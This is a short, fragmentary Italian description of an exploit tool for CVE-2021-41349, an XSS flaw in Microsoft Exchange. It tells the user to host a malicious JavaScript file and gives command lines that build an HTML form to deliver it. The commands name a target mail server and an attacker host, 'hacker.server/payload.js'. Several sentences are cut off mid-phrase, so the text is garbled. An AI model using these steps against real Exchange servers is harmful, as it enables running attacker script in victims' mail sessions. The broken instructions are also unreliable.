
Strumento di exploit per CVE-2021-41349 che genera un modulo HTML per consegnare payload XSS ai server Microsoft Exchange, consentendo l'esecuzione di JavaScript arbitrario.
Sfruttamento: CVE-2021-41349
Questo strumento di sfruttamento crea un modulo per inviare un payload XSS al server Exchange di destinazione.
Devi creare un file js contenente ciò che desideri fare.
js e caricalo da qualche parte.CVE-2021-41349.py seguendo i passaggi seguenti.python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
oppure:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
html sul server.